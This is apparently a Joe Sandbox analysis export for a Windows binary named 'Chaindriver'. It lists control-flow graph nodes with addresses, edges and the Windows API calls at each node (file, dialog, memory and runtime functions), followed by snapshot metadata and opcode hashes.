26146->26143 26150 7ff720b4a428 26149->26150 26150->25847 26152 7ff720b424bd CreateFileW 26151->26152 26154 7ff720b4256e GetLastError 26152->26154 26157 7ff720b4262e 26152->26157 26155 7ff720b469cc 49 API calls 26154->26155 26156 7ff720b4259c 26155->26156 26158 7ff720b425a0 CreateFileW GetLastError 26156->26158 26164 
7ff720b425ec 26156->26164 26159 7ff720b42671 SetFileTime 26157->26159 26163 7ff720b4268f 26157->26163 26158->26164 26159->26163 26160 7ff720b426c8 26161 7ff720b622a0 _handle_error 8 API calls 26160->26161 26162 7ff720b426db 26161->26162 26162->26096 26162->26104 26163->26160 26166 7ff720b320b0 33 API calls 26163->26166 26164->26157 26165 7ff720b426f6 26164->26165 26167 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 26165->26167 26166->26160 26168 7ff720b426fb 26167->26168 26170 7ff720b6a3fd 26169->26170 26172 7ff720b6a412 26170->26172 26214 7ff720b6d61c 15 API calls memcpy_s 26170->26214 26174 7ff720b622a0 _handle_error 8 API calls 26172->26174 26173 7ff720b6a407 26215 7ff720b67864 31 API calls _invalid_parameter_noinfo_noreturn 26173->26215 26176 7ff720b49af7 26174->26176 26176->26106 26179 7ff720b42b8d 26177->26179 26180 7ff720b42ba9 26177->26180 26178 7ff720b42bbb 26178->26120 26179->26178 26216 7ff720b3b9d4 99 API calls Concurrency::cancel_current_task 26179->26216 26180->26178 26182 7ff720b42bc1 SetFilePointer 26180->26182 26182->26178 26183 7ff720b42bde GetLastError 26182->26183 26183->26178 26184 7ff720b42be8 26183->26184 26184->26178 26217 7ff720b3b9d4 99 API calls Concurrency::cancel_current_task 26184->26217 26187 7ff720b428b6 26186->26187 26188 7ff720b428bd 26186->26188 26187->26120 26188->26187 26190 7ff720b422e0 GetStdHandle ReadFile GetLastError GetLastError GetFileType 26188->26190 26218 7ff720b3b8b4 99 API calls Concurrency::cancel_current_task 26188->26218 26190->26188 26219 7ff720b42738 26191->26219 26194 7ff720b42a87 26194->26120 26197 7ff720b4201e 26196->26197 26198 7ff720b4202f 26196->26198 26197->26198 26199 7ff720b4202a 26197->26199 26200 7ff720b42031 26197->26200 26227 7ff720b422a0 26199->26227 26231 7ff720b42090 26200->26231 26203->26089 26204->26143 26205->26143 26206->26143 26207->26139 26208->26141 26209->26124 26210->26130 26211->26132 26212->26133 26213->26090 26214->26173 26215->26172 26225 7ff720b42749 _snwprintf 
26219->26225 26220 7ff720b42775 26222 7ff720b622a0 _handle_error 8 API calls 26220->26222 26221 7ff720b42850 SetFilePointer 26221->26220 26223 7ff720b42878 GetLastError 26221->26223 26224 7ff720b427dd 26222->26224 26223->26220 26224->26194 26226 7ff720b3b9d4 99 API calls Concurrency::cancel_current_task 26224->26226 26225->26220 26225->26221 26228 7ff720b422c3 26227->26228 26229 7ff720b422af 26227->26229 26228->26198 26229->26228 26230 7ff720b42090 100 API calls 26229->26230 26230->26228 26232 7ff720b420aa 26231->26232 26233 7ff720b420c2 26231->26233 26232->26233 26235 7ff720b420b6 CloseHandle 26232->26235 26234 7ff720b420e6 26233->26234 26237 7ff720b3b554 99 API calls 26233->26237 26234->26198 26235->26233 26237->26234 26239 7ff720b61553 26238->26239 26240 7ff720b614ee 26238->26240 26239->25858 26239->25859 26254 7ff720b61584 26240->26254 26243 7ff720b6154e 26245 7ff720b61584 DloadReleaseSectionWriteAccess 3 API calls 26243->26245 26245->26239 26247 7ff720b617f8 26246->26247 26248 7ff720b61851 26246->26248 26249 7ff720b61584 DloadReleaseSectionWriteAccess 3 API calls 26247->26249 26248->25874 26250 7ff720b617fd 26249->26250 26251 7ff720b6184c 26250->26251 26252 7ff720b61758 DloadProtectSection 3 API calls 26250->26252 26253 7ff720b61584 DloadReleaseSectionWriteAccess 3 API calls 26251->26253 26252->26251 26253->26248 26255 7ff720b614f3 26254->26255 26256 7ff720b6159f 26254->26256 26255->26243 26261 7ff720b61758 26255->26261 26256->26255 26257 7ff720b615a4 GetModuleHandleW 26256->26257 26258 7ff720b615be GetProcAddress 26257->26258 26260 7ff720b615b9 26257->26260 26259 7ff720b615d3 GetProcAddress 26258->26259 26258->26260 26259->26260 26260->26255 26264 7ff720b6177a DloadProtectSection 26261->26264 26262 7ff720b61782 26262->26243 26263 7ff720b617ba VirtualProtect 26263->26262 26264->26262 26264->26263 26266 7ff720b61624 VirtualQuery GetSystemInfo 26264->26266 26266->26263 26267->25891 26268->25893 26269->25888 26271 7ff720b4b952 memcpy_s 26270->26271 26273 
7ff720b4b9f8 26271->26273 26274 7ff720b4b9c4 GetProcAddressForCaller GetProcAddress 26271->26274 26272 7ff720b4ba86 GetCurrentProcessId 26275 7ff720b4ba67 26272->26275 26273->26272 26276 7ff720b4ba2a 26273->26276 26274->26273 26275->25896 26276->26275 26282 7ff720b3b67c 99 API calls _handle_error 26276->26282 26278 7ff720b4ba52 26283 7ff720b3ba60 99 API calls 3 library calls 26278->26283 26280 7ff720b4ba5a 26284 7ff720b3b674 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 26280->26284 26282->26278 26283->26280 26284->26275 26285 7ff720b60d75 14 API calls _com_raise_error 26367 7ff720b5b110 26710 7ff720b3255c 26367->26710 26369 7ff720b5b15b 26370 7ff720b5be13 26369->26370 26371 7ff720b5b16f 26369->26371 26525 7ff720b5b18c 26369->26525 26977 7ff720b5f310 26370->26977 26375 7ff720b5b25b 26371->26375 26376 7ff720b5b17f 26371->26376 26371->26525 26374 7ff720b622a0 _handle_error 8 API calls 26379 7ff720b5c2d0 26374->26379 26382 7ff720b5b311 26375->26382 26387 7ff720b5b275 26375->26387 26380 7ff720b5b187 26376->26380 26381 7ff720b5b229 26376->26381 26377 7ff720b5be3a SendMessageW 26378 7ff720b5be49 26377->26378 26384 7ff720b5be55 SendDlgItemMessageW 26378->26384 26385 7ff720b5be70 GetDlgItem SendMessageW 26378->26385 26390 7ff720b4aaa0 48 API calls 26380->26390 26380->26525 26386 7ff720b5b24b EndDialog 26381->26386 26381->26525 26718 7ff720b322bc GetDlgItem 26382->26718 26384->26385 26389 7ff720b4629c 35 API calls 26385->26389 26386->26525 26391 7ff720b4aaa0 48 API calls 26387->26391 26392 7ff720b5bec7 GetDlgItem 26389->26392 26393 7ff720b5b1b6 26390->26393 26394 7ff720b5b293 SetDlgItemTextW 26391->26394 26996 7ff720b32520 26392->26996 27000 7ff720b31ec4 34 API calls _handle_error 26393->27000 26399 7ff720b5b2a6 26394->26399 26397 7ff720b5b388 GetDlgItem 26403 7ff720b5b3cf SetFocus 26397->26403 26404 7ff720b5b3a2 SendMessageW SendMessageW 26397->26404 26398 7ff720b5b375 26414 7ff720b5bc45 26398->26414 26535 7ff720b5b331 EndDialog 26398->26535 26405 
7ff720b5b2c0 GetMessageW 26399->26405 26399->26525 26402 7ff720b5b1c6 26410 7ff720b5b1dc 26402->26410 26417 7ff720b3250c SetDlgItemTextW 26402->26417 26406 7ff720b5b3e5 26403->26406 26407 7ff720b5b472 26403->26407 26404->26403 26412 7ff720b5b2de IsDialogMessageW 26405->26412 26405->26525 26413 7ff720b4aaa0 48 API calls 26406->26413 26732 7ff720b38d04 26407->26732 26408 7ff720b5b35a 26415 7ff720b31fa0 31 API calls 26408->26415 26424 7ff720b5c2e3 26410->26424 26410->26525 26412->26399 26419 7ff720b5b2f3 TranslateMessage DispatchMessageW 26412->26419 26420 7ff720b5b3ef 26413->26420 26421 7ff720b4aaa0 48 API calls 26414->26421 26415->26525 26417->26410 26418 7ff720b5b4ac 26742 7ff720b5ef00 26418->26742 26419->26399 26434 7ff720b3129c 33 API calls 26420->26434 26425 7ff720b5bc56 SetDlgItemTextW 26421->26425 26430 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 26424->26430 26429 7ff720b4aaa0 48 API calls 26425->26429 26435 7ff720b5bc88 26429->26435 26436 7ff720b5c2e8 26430->26436 26433 7ff720b4aaa0 48 API calls 26438 7ff720b5b4d5 26433->26438 26439 7ff720b5b418 26434->26439 26450 7ff720b3129c 33 API calls 26435->26450 26445 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 26436->26445 26442 7ff720b4da14 48 API calls 26438->26442 26443 7ff720b5f024 24 API calls 26439->26443 26447 7ff720b5b4e8 26442->26447 26448 7ff720b5b425 26443->26448 26451 7ff720b5c2ee 26445->26451 26756 7ff720b5f024 26447->26756 26448->26436 26470 7ff720b5b468 26448->26470 26479 7ff720b5bcb1 26450->26479 26463 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 26451->26463 26462 7ff720b5bd5a 26472 7ff720b4aaa0 48 API calls 26462->26472 26473 7ff720b5c2f4 26463->26473 26466 7ff720b31fa0 31 API calls 26477 7ff720b5b506 26466->26477 26469 7ff720b5b56c 26482 7ff720b5b59a 26469->26482 27002 7ff720b43268 26469->27002 26470->26469 27001 7ff720b5fa00 33 API calls 2 library calls 26470->27001 26474 7ff720b5bd64 26472->26474 26484 7ff720b67884 
_invalid_parameter_noinfo_noreturn 31 API calls 26473->26484 26494 7ff720b3129c 33 API calls 26474->26494 26477->26451 26477->26470 26479->26462 26489 7ff720b3129c 33 API calls 26479->26489 26770 7ff720b42f18 26482->26770 26488 7ff720b5c2fa 26484->26488 26501 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 26488->26501 26495 7ff720b5bcff 26489->26495 26500 7ff720b5bd8d 26494->26500 26503 7ff720b4aaa0 48 API calls 26495->26503 26498 7ff720b5b5cc 26785 7ff720b47f84 26498->26785 26499 7ff720b5b5b4 GetLastError 26499->26498 26517 7ff720b3129c 33 API calls 26500->26517 26507 7ff720b5c300 26501->26507 26508 7ff720b5bd0a 26503->26508 26505 7ff720b5b58e 27005 7ff720b59d10 12 API calls _handle_error 26505->27005 26518 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 26507->26518 26513 7ff720b31150 33 API calls 26508->26513 26511 7ff720b5b5de 26515 7ff720b5b5f4 26511->26515 26516 7ff720b5b5e5 GetLastError 26511->26516 26519 7ff720b5bd22 26513->26519 26521 7ff720b5b69c 26515->26521 26526 7ff720b5b60b GetTickCount 26515->26526 26527 7ff720b5b6ab 26515->26527 26516->26515 26522 7ff720b5bdce 26517->26522 26523 7ff720b5c306 26518->26523 26529 7ff720b32034 33 API calls 26519->26529 26521->26527 26543 7ff720b5baf9 26521->26543 26536 7ff720b31fa0 31 API calls 26522->26536 26528 7ff720b3255c 61 API calls 26523->26528 26525->26374 26788 7ff720b34228 26526->26788 26532 7ff720b5b9d0 26527->26532 26540 7ff720b46414 34 API calls 26527->26540 26531 7ff720b5c364 26528->26531 26533 7ff720b5bd3e 26529->26533 26537 7ff720b5c368 26531->26537 26546 7ff720b5c409 GetDlgItem SetFocus 26531->26546 26593 7ff720b5c37d 26531->26593 26532->26535 27016 7ff720b3bd1c 33 API calls 26532->27016 26541 7ff720b31fa0 31 API calls 26533->26541 26535->26408 26544 7ff720b5bdf8 26536->26544 26553 7ff720b622a0 _handle_error 8 API calls 26537->26553 26548 7ff720b5b6ce 26540->26548 26549 7ff720b5bd4c 26541->26549 26558 7ff720b4aaa0 48 API calls 26543->26558 26551 7ff720b31fa0 31 API calls 
API calls std::_Xinvalid_argument 27767->27930 27768 7ff720b327ed __std_swap_ranges_trivially_swappable 27929 7ff720b33bc0 31 API calls _invalid_parameter_noinfo_noreturn 27768->27929 27771->27768 27772 7ff720b62150 33 API calls 27771->27772 27772->27768 27774 7ff720b32888 27774->27702 27775->27725 27776->27716 27777->27718 27778->27725 27780 7ff720b51f45 std::bad_alloc::bad_alloc 27779->27780 27781 7ff720b51fd6 std::bad_alloc::bad_alloc 27779->27781 27783 7ff720b63ff8 Concurrency::cancel_current_task 2 API calls 27780->27783 27784 7ff720b51f8f std::bad_alloc::bad_alloc 27780->27784 27785 7ff720b36b59 27780->27785 27782 7ff720b63ff8 Concurrency::cancel_current_task 2 API calls 27781->27782 27782->27780 27783->27784 27784->27785 27786 7ff720b63ff8 Concurrency::cancel_current_task 2 API calls 27784->27786 27785->27747 27785->27749 27785->27750 27787 7ff720b52029 27786->27787 27789 7ff720b44740 27788->27789 27791 7ff720b4474a 27788->27791 27790 7ff720b62150 33 API calls 27789->27790 27790->27791 27791->27756 27793 7ff720b41776 memcpy_s 27792->27793 27852 7ff720b48a08 27793->27852 27795 7ff720b417aa 27796 7ff720b417e8 27795->27796 27799 7ff720b48a08 146 API calls 27795->27799 27862 7ff720b48c0c 27795->27862 27797 7ff720b4180e 27796->27797 27800 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 27796->27800 27797->27761 27799->27795 27808 7ff720b5180e 27807->27808 27810 7ff720b51821 27808->27810 27872 7ff720b4e8c4 27808->27872 27814 7ff720b51858 27810->27814 27868 7ff720b622ec 27810->27868 27812 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 27813 7ff720b51a50 27812->27813 27816 7ff720b519b7 27814->27816 27879 7ff720b4a944 31 API calls _invalid_parameter_noinfo_noreturn 27814->27879 27816->27812 27817->27741 27818->27765 27820 7ff720b340dd 27819->27820 27822 7ff720b340d7 memcpy_s 27819->27822 27820->27822 27880 7ff720b34120 27820->27880 27822->27747 27824 7ff720b48988 27823->27824 27825 7ff720b48972 27823->27825 27886 7ff720b3a1a0 27824->27886 
27826 7ff720b3a1a0 109 API calls 27825->27826 27828 7ff720b48980 27826->27828 27828->27748 27830 7ff720b51ea9 27829->27830 27831 7ff720b51edd 27830->27831 27832 7ff720b51ed5 27830->27832 27834 7ff720b51ec9 27830->27834 27831->27761 27920 7ff720b538e4 151 API calls 27832->27920 27899 7ff720b5202c 27834->27899 27836 7ff720b546b3 memcpy_s 27836->27836 27849->27763 27850->27765 27851->27741 27854 7ff720b48a51 memcpy_s 27852->27854 27855 7ff720b48b8d 27852->27855 27853 7ff720b48bda 27856 7ff720b4e784 SetThreadExecutionState RtlPcToFileHeader RaiseException 27853->27856 27854->27855 27858 7ff720b48bdf 27854->27858 27859 7ff720b560ac 137 API calls 27854->27859 27860 7ff720b44848 108 API calls 27854->27860 27861 7ff720b42890 104 API calls 27854->27861 27855->27853 27857 7ff720b3a174 8 API calls 27855->27857 27856->27858 27857->27853 27858->27795 27859->27854 27860->27854 27861->27854 27863 7ff720b48c4b 27862->27863 27866 7ff720b48c32 memcpy_s 27862->27866 27863->27866 27869 7ff720b6231f 27868->27869 27870 7ff720b62348 27869->27870 27871 7ff720b517f0 108 API calls 27869->27871 27870->27814 27871->27869 27873 7ff720b4ec58 103 API calls 27872->27873 27874 7ff720b4e8db ReleaseSemaphore 27873->27874 27875 7ff720b4e91f DeleteCriticalSection CloseHandle CloseHandle 27874->27875 27876 7ff720b4e900 27874->27876 27877 7ff720b4e9d8 101 API calls 27876->27877 27878 7ff720b4e90a CloseHandle 27877->27878 27878->27875 27878->27876 27879->27816 27883 7ff720b34149 27880->27883 27885 7ff720b34168 memcpy_s __std_swap_ranges_trivially_swappable 27880->27885 27881 7ff720b32018 33 API calls 27882 7ff720b341eb 27881->27882 27884 7ff720b62150 33 API calls 27883->27884 27883->27885 27884->27885 27885->27881 27887 7ff720b3a200 27886->27887 27898 7ff720b3a290 27886->27898 27889 7ff720b4b8d0 102 API calls 27887->27889 27887->27898 27888 7ff720b622a0 _handle_error 8 API calls 27890 7ff720b3a2e0 27888->27890 27891 7ff720b3a226 27889->27891 27890->27828 27892 7ff720b50ee8 WideCharToMultiByte 
27891->27892 27893 7ff720b3a248 27892->27893 27894 7ff720b3a292 27893->27894 27895 7ff720b3a256 27893->27895 27896 7ff720b3a2fc 105 API calls 27894->27896 27897 7ff720b3a664 109 API calls 27895->27897 27895->27898 27896->27898 27897->27898 27898->27888 27901 7ff720b52048 memcpy_s 27899->27901 27900 7ff720b5213a 27900->27836 27901->27900 27902 7ff720b3b76c 82 API calls 27901->27902 27902->27901 27920->27831 27929->27774 27932 7ff720b48852 27931->27932 27933 7ff720b48842 27931->27933 27932->27437 27938 7ff720b423b0 27933->27938 27936 7ff720b622a0 _handle_error 8 API calls 27935->27936 27937 7ff720b3f7ec 27936->27937 27937->27338 27937->27440 27939 7ff720b423cf 27938->27939 27942 7ff720b42a60 101 API calls 27939->27942 27940 7ff720b423e8 27943 7ff720b42b70 101 API calls 27940->27943 27941 7ff720b423f8 27941->27932 27942->27940 27943->27941 27944->27451 27946 7ff720b35e6f 27945->27946 28009 7ff720b485b0 27946->28009 27948 7ff720b36134 28019 7ff720b36fcc 82 API calls 27948->28019 27950 7ff720b369af 27951 7ff720b622a0 _handle_error 8 API calls 27950->27951 27954 7ff720b369c3 27951->27954 27952 7ff720b369e4 27957 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 27952->27957 27953 7ff720b36973 28032 7ff720b3466c 82 API calls 27953->28032 27954->27463 27956 7ff720b3612e 27956->27948 27956->27953 27959 7ff720b485b0 104 API calls 27956->27959 27958 7ff720b369e9 27957->27958 27960 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 27958->27960 27961 7ff720b361a4 27959->27961 27962 7ff720b369ef 27960->27962 27961->27948 27965 7ff720b361ac 27961->27965 27963 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 27962->27963 27964 7ff720b369f5 27963->27964 27966 7ff720b3623f 27965->27966 28020 7ff720b3466c 82 API calls 27965->28020 27966->27953 27968 7ff720b36266 27966->27968 27971 7ff720b368b7 27968->27971 27972 7ff720b362ce 27968->27972 27974 7ff720b44cc4 31 API calls 27971->27974 27973 7ff720b36481 27972->27973 27976 7ff720b362e0 27972->27976 27993 
7ff720b3613c 27976->27993 27993->27950 27993->27952 27993->27962 28007->27463 28010 7ff720b4865a 28009->28010 28011 7ff720b485d4 28009->28011 28012 7ff720b4863c 28010->28012 28014 7ff720b340b0 33 API calls 28010->28014 28011->28012 28013 7ff720b340b0 33 API calls 28011->28013 28012->27956 28015 7ff720b4860d 28013->28015 28016 7ff720b48673 28014->28016 28033 7ff720b3a174 28015->28033 28018 7ff720b42890 104 API calls 28016->28018 28018->28012 28019->27993 28034 7ff720b3a185 28033->28034 28035 7ff720b3a19a 28034->28035 28037 7ff720b4aed4 8 API calls 2 library calls 28034->28037 28035->28012 28037->28035 28045 7ff720b39be7 28038->28045 28039 7ff720b39c1b 28040 7ff720b622a0 _handle_error 8 API calls 28039->28040 28041 7ff720b39c9d 28040->28041 28041->27480 28044 7ff720b31fa0 31 API calls 28044->28039 28045->28039 28046 7ff720b39cae 28045->28046 28050 7ff720b39c83 28045->28050 28182 7ff720b45254 34 API calls 3 library calls 28045->28182 28183 7ff720b4dadc 33 API calls 28045->28183 28047 7ff720b39cbf 28046->28047 28184 7ff720b4d9c4 CompareStringW 28046->28184 28049 7ff720b320b0 33 API calls 28047->28049 28047->28050 28049->28050 28050->28044 28064 7ff720b45efa 28051->28064 28052 7ff720b4618e 28185 7ff720b3704c 47 API calls memcpy_s 28052->28185 28053 7ff720b622a0 _handle_error 8 API calls 28054 7ff720b3fb39 28053->28054 28054->27484 28138 7ff720b47c54 47 API calls 2 library calls 28054->28138 28056 7ff720b3129c 33 API calls 28058 7ff720b460e9 28056->28058 28057 7ff720b46194 28059 7ff720b31fa0 31 API calls 28058->28059 28061 7ff720b460fb memcpy_s 28058->28061 28059->28061 28060 7ff720b4615b 28060->28053 28061->28060 28062 7ff720b46189 28061->28062 28063 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 28062->28063 28063->28052 28064->28052 28064->28056 28064->28060 28137->27474 28138->27485 28180->27502 28181->27502 28182->28045 28183->28045 28184->28047 28185->28057 28246->27647 28247->27652 28249 7ff720b4876f 28248->28249 28257 7ff720b4879f 28248->28257 28250 
7ff720b622ec 108 API calls 28249->28250 28253 7ff720b4878a 28250->28253 28251 7ff720b622ec 108 API calls 28254 7ff720b487d4 28251->28254 28256 7ff720b622ec 108 API calls 28253->28256 28258 7ff720b622ec 108 API calls 28254->28258 28255 7ff720b48805 28259 7ff720b445dc 108 API calls 28255->28259 28256->28257 28257->28251 28260 7ff720b487eb 28257->28260 28258->28260 28261 7ff720b48811 28259->28261 28263 7ff720b445dc 28260->28263 28262->27642 28264 7ff720b445f2 28263->28264 28266 7ff720b445fa 28263->28266 28265 7ff720b4e8c4 108 API calls 28264->28265 28265->28266 28266->28255 28267->26986 28268->26993 28269->26995 26286 7ff720b6beac 26293 7ff720b6bbb4 26286->26293 26298 7ff720b6d3c0 35 API calls 2 library calls 26293->26298 26295 7ff720b6bbbf 26299 7ff720b6cfe8 35 API calls abort 26295->26299 26298->26295 26353 7ff720b6d8cc 26354 7ff720b6d917 26353->26354 26358 7ff720b6d8db abort 26353->26358 26360 7ff720b6d61c 15 API calls memcpy_s 26354->26360 26356 7ff720b6d8fe HeapAlloc 26357 7ff720b6d915 26356->26357 26356->26358 26358->26354 26358->26356 26359 7ff720b6bb40 abort 2 API calls 26358->26359 26359->26358 26360->26357 25300 7ff720b60360 25301 7ff720b60417 25300->25301 25302 7ff720b6039f 25300->25302 25325 7ff720b4aaa0 25301->25325 25304 7ff720b4aaa0 48 API calls 25302->25304 25306 7ff720b603b3 25304->25306 25340 7ff720b4da14 25306->25340 25307 7ff720b4da14 48 API calls 25314 7ff720b603c2 memcpy_s 25307->25314 25310 7ff720b604c1 25337 7ff720b3250c 25310->25337 25312 7ff720b6054c 25315 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 25312->25315 25313 7ff720b60546 25343 7ff720b67884 25313->25343 25314->25312 25314->25313 25332 7ff720b31fa0 25314->25332 25318 7ff720b60552 25315->25318 25326 7ff720b4aab3 25325->25326 25348 7ff720b49734 25326->25348 25329 7ff720b4ab18 LoadStringW 25330 7ff720b4ab46 25329->25330 25331 7ff720b4ab31 LoadStringW 25329->25331 25330->25307 25331->25330 25333 7ff720b31fdc 25332->25333 25334 7ff720b31fb3 25332->25334 25333->25310 
25334->25333 25335 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 25334->25335 25336 7ff720b32000 25335->25336 25338 7ff720b32516 SetDlgItemTextW 25337->25338 25339 7ff720b32513 25337->25339 25339->25338 25385 7ff720b4d7f0 25340->25385 25478 7ff720b677bc 31 API calls 2 library calls 25343->25478 25345 7ff720b6789d 25479 7ff720b678b4 16 API calls abort 25345->25479 25355 7ff720b495f8 25348->25355 25351 7ff720b49799 25365 7ff720b622a0 25351->25365 25356 7ff720b49652 25355->25356 25364 7ff720b496f0 25355->25364 25360 7ff720b49680 25356->25360 25378 7ff720b50ee8 WideCharToMultiByte 25356->25378 25358 7ff720b622a0 _handle_error 8 API calls 25361 7ff720b49724 25358->25361 25359 7ff720b496af 25381 7ff720b6a1f0 31 API calls 2 library calls 25359->25381 25360->25359 25380 7ff720b4aa48 45 API calls _snwprintf 25360->25380 25361->25351 25374 7ff720b497c0 25361->25374 25364->25358 25366 7ff720b622a9 25365->25366 25367 7ff720b497b2 25366->25367 25368 7ff720b624d0 IsProcessorFeaturePresent 25366->25368 25367->25329 25367->25330 25369 7ff720b624e8 25368->25369 25382 7ff720b626c4 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 25369->25382 25371 7ff720b624fb 25383 7ff720b62490 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 25371->25383 25375 7ff720b49800 25374->25375 25377 7ff720b49829 25374->25377 25384 7ff720b6a1f0 31 API calls 2 library calls 25375->25384 25377->25351 25379 7ff720b50f2a 25378->25379 25379->25360 25380->25359 25381->25364 25382->25371 25384->25377 25401 7ff720b4d44c 25385->25401 25390 7ff720b4d8f0 25399 7ff720b4d91f 25390->25399 25443 7ff720b39d78 33 API calls 25390->25443 25391 7ff720b4d861 _snwprintf 25391->25390 25415 7ff720b69e70 25391->25415 25442 7ff720b39d78 33 API calls 25391->25442 25393 7ff720b4d993 25394 7ff720b622a0 _handle_error 8 API calls 25393->25394 25396 7ff720b4d9a7 25394->25396 25395 7ff720b4d9bb 25397 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 25395->25397 
25396->25314 25398 7ff720b4d9c0 25397->25398 25399->25393 25399->25395 25402 7ff720b4d5e1 25401->25402 25404 7ff720b4d47e 25401->25404 25405 7ff720b4cb3c 25402->25405 25403 7ff720b31744 33 API calls 25403->25404 25404->25402 25404->25403 25406 7ff720b4cb72 25405->25406 25413 7ff720b4cc3c 25405->25413 25407 7ff720b4cb82 25406->25407 25410 7ff720b4cbdc 25406->25410 25411 7ff720b4cc37 25406->25411 25407->25391 25410->25407 25444 7ff720b62150 25410->25444 25453 7ff720b31f80 33 API calls 3 library calls 25411->25453 25454 7ff720b32004 33 API calls std::_Xinvalid_argument 25413->25454 25416 7ff720b69ece 25415->25416 25417 7ff720b69eb6 25415->25417 25416->25417 25419 7ff720b69ed8 25416->25419 25466 7ff720b6d61c 15 API calls memcpy_s 25417->25466 25468 7ff720b67e70 35 API calls 2 library calls 25419->25468 25420 7ff720b69ebb 25467 7ff720b67864 31 API calls _invalid_parameter_noinfo_noreturn 25420->25467 25423 7ff720b622a0 _handle_error 8 API calls 25425 7ff720b6a08b 25423->25425 25424 7ff720b69ee9 memcpy_s 25469 7ff720b67df0 15 API calls memcpy_s 25424->25469 25425->25391 25427 7ff720b69f54 25470 7ff720b68278 46 API calls 3 library calls 25427->25470 25429 7ff720b69f5d 25430 7ff720b69f65 25429->25430 25431 7ff720b69f94 25429->25431 25471 7ff720b6d88c 25430->25471 25433 7ff720b69fec 25431->25433 25434 7ff720b69fa3 25431->25434 25435 7ff720b6a012 25431->25435 25436 7ff720b69f9a 25431->25436 25437 7ff720b6d88c __free_lconv_mon 15 API calls 25433->25437 25439 7ff720b6d88c __free_lconv_mon 15 API calls 25434->25439 25435->25433 25438 7ff720b6a01c 25435->25438 25436->25433 25436->25434 25441 7ff720b69ec6 25437->25441 25440 7ff720b6d88c __free_lconv_mon 15 API calls 25438->25440 25439->25441 25440->25441 25441->25423 25442->25391 25443->25399 25445 7ff720b6215b 25444->25445 25446 7ff720b62174 25445->25446 25448 7ff720b6217a 25445->25448 25455 7ff720b6bb40 25445->25455 25446->25407 25451 7ff720b62185 25448->25451 25458 7ff720b62efc RtlPcToFileHeader RaiseException 
Concurrency::cancel_current_task std::bad_alloc::bad_alloc 25448->25458 25459 7ff720b31f80 33 API calls 3 library calls 25451->25459 25452 7ff720b6218b 25453->25413 25460 7ff720b6bb80 25455->25460 25458->25451 25459->25452 25465 7ff720b6f318 EnterCriticalSection 25460->25465 25466->25420 25467->25441 25468->25424 25469->25427 25470->25429 25472 7ff720b6d891 RtlFreeHeap 25471->25472 25474 7ff720b6d8c1 __free_lconv_mon 25471->25474 25473 7ff720b6d8ac 25472->25473 25472->25474 25477 7ff720b6d61c 15 API calls memcpy_s 25473->25477 25474->25441 25476 7ff720b6d8b1 GetLastError 25476->25474 25477->25476 25478->25345 26303 7ff720b62070 26304 7ff720b62086 _com_error::_com_error 26303->26304 26309 7ff720b63ff8 26304->26309 26306 7ff720b62097 26307 7ff720b61880 _com_raise_error 14 API calls 26306->26307 26308 7ff720b620e3 26307->26308 26310 7ff720b64017 26309->26310 26311 7ff720b64034 RtlPcToFileHeader 26309->26311 26310->26311 26312 7ff720b6404c 26311->26312 26313 7ff720b6405b RaiseException 26311->26313 26312->26313 26313->26306 26320 7ff720b6bd78 26321 7ff720b6bd9e GetModuleHandleW 26320->26321 26322 7ff720b6bde8 26320->26322 26321->26322 26329 7ff720b6bdab 26321->26329 26337 7ff720b6f318 EnterCriticalSection 26322->26337 26329->26322 26338 7ff720b6bf30 GetModuleHandleExW 26329->26338 26339 7ff720b6bf5a GetProcAddress 26338->26339 26340 7ff720b6bf81 26338->26340 26339->26340 26341 7ff720b6bf74 26339->26341 26342 7ff720b6bf8b FreeLibrary 26340->26342 26343 7ff720b6bf91 26340->26343 26341->26340 26342->26343 26343->26322 28270 7ff720b6114f 28271 7ff720b61082 28270->28271 28272 7ff720b61880 _com_raise_error 14 API calls 28271->28272 28272->28271
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1686753828.00007FF720B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF720B30000, based on PE: true
• Associated: 00000007.00000002.1686728518.00007FF720B30000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1686826178.00007FF720B8B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1686826178.00007FF720B94000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1686880103.00007FF720B9A000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1686880103.00007FF720B9E000.00000002.00000001.01000000.0000000C.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ff720b30000_Chaindriver.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                    • String ID: __tmp_reference_source_
                                                    • API String ID: 3668304517-685763994
                                                    • Opcode ID: 8210d87abdacc87ac5e9da30224aa90e187ed07e086d8e0259362a61d43f00e5
                                                    • Instruction ID: 46670f2d101dc4bf16691f7cacdafa07d2b7e68075847ee555ba4484a72e511a
                                                    • Opcode Fuzzy Hash: 8210d87abdacc87ac5e9da30224aa90e187ed07e086d8e0259362a61d43f00e5
                                                    • Instruction Fuzzy Hash: 52D28462A186C292EA74AB25DD543AEE761FB41780F904132DB9E13BA5CF3CF554CB30

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    Similarity
                                                    • API ID: AddressProc$CallerCurrentDirectoryProcessSystem
